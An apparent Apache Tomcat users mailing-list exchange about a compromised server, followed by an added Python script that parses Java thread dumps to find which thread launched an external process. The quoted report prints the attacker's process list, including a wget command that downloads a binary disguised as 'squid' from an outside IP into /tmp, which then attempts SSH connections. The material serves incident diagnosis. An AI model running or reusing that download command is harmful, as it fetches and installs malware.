2014-04-30 0:41 GMT+04:00 Leonardo Santagostini <lsantagost...@gmail.com>:
> Hello Dan,
>
> Nope, the attacker is executing locally the following:
>
> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
>
> And then it launches squid, which tries to connect via ssh to various places.
>
> Right now it's time to leave the office, but in a few hours I will paste to
> pastebin access logs, config files, whatever you tell me.
>
> This is my pstree:
>
> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
> init─┬─atd
>      ├─java─┬─sh───wget
>      │      └─263*[{java}]
sh launched by tomcat's java? Take a thread dump:
https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F

It will show the stack trace of the thread that launched the external process.

Best regards,
Konstantin Kolinko

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
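As an added example (not code from either poster), a small Python script that reads a jstack-style thread dump such as the wiki procedure above produces and reports which thread is sitting inside a process-launch call, together with the first non-JDK frame below it, which is the webapp code to inspect. The sample dump is constructed, and the JSP class name in it is a placeholder.

```python
import re
from typing import Dict, List

# JDK frames that mean "this thread spawned an external process" (assumed
# names from the OpenJDK 7 class library; other JDKs may name ProcessImpl).
LAUNCH_FRAMES = ("java.lang.ProcessBuilder.start", "java.lang.Runtime.exec",
                 "java.lang.UNIXProcess.", "java.lang.ProcessImpl.")
JDK_PREFIXES = ("java.", "javax.", "sun.", "jdk.")
THREAD_HEADER = re.compile(r'^"(?P<name>[^"]+)"')
FRAME = re.compile(r"^\s+at\s+(?P<frame>.+?)\s*$")


def parse_thread_dump(text: str) -> Dict[str, List[str]]:
    """Map each thread name to its 'at ...' frames, top of stack first."""
    threads: Dict[str, List[str]] = {}
    current = None
    for line in text.splitlines():
        if header := THREAD_HEADER.match(line):
            current = header.group("name")
            threads[current] = []
        elif (frame := FRAME.match(line)) and current is not None:
            threads[current].append(frame.group("frame"))
    return threads


def find_process_launchers(text: str) -> Dict[str, str]:
    """For each thread still inside a process-launch call, return the first
    non-JDK frame below it: that is the webapp (or library) code to inspect."""
    hits: Dict[str, str] = {}
    for name, frames in parse_thread_dump(text).items():
        launch = [i for i, f in enumerate(frames) if f.startswith(LAUNCH_FRAMES)]
        if launch:
            below = frames[launch[0]:]
            hits[name] = next((f for f in below if not f.startswith(JDK_PREFIXES)), below[-1])
    return hits


# Constructed sample (not from the poster's server): exec-3 is blocked in
# waitFor() on a process launched from a hypothetical JSP; exec-4 is idle.
SAMPLE_DUMP = """\
"http-bio-8080-exec-3" daemon prio=10 tid=0x00007f1a nid=0x22c5 in Object.wait()
   java.lang.Thread.State: WAITING (on object monitor)
        at java.lang.Object.wait(Native Method)
        at java.lang.UNIXProcess.waitFor(UNIXProcess.java:263)
        at org.apache.jsp.example_jsp._jspService(example_jsp.java:71)
        at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
"http-bio-8080-exec-4" daemon prio=10 tid=0x00007f1b nid=0x22c6 waiting on condition
        at sun.misc.Unsafe.park(Native Method)
        at org.apache.tomcat.util.threads.TaskQueue.take(TaskQueue.java:104)
"""
```

The dump only identifies the launching thread while it is still inside the call (blocked in waitFor() or reading the child's output), which matches this case since sh is still a child of the java process; if the thread has already returned, the access logs are the next place to look.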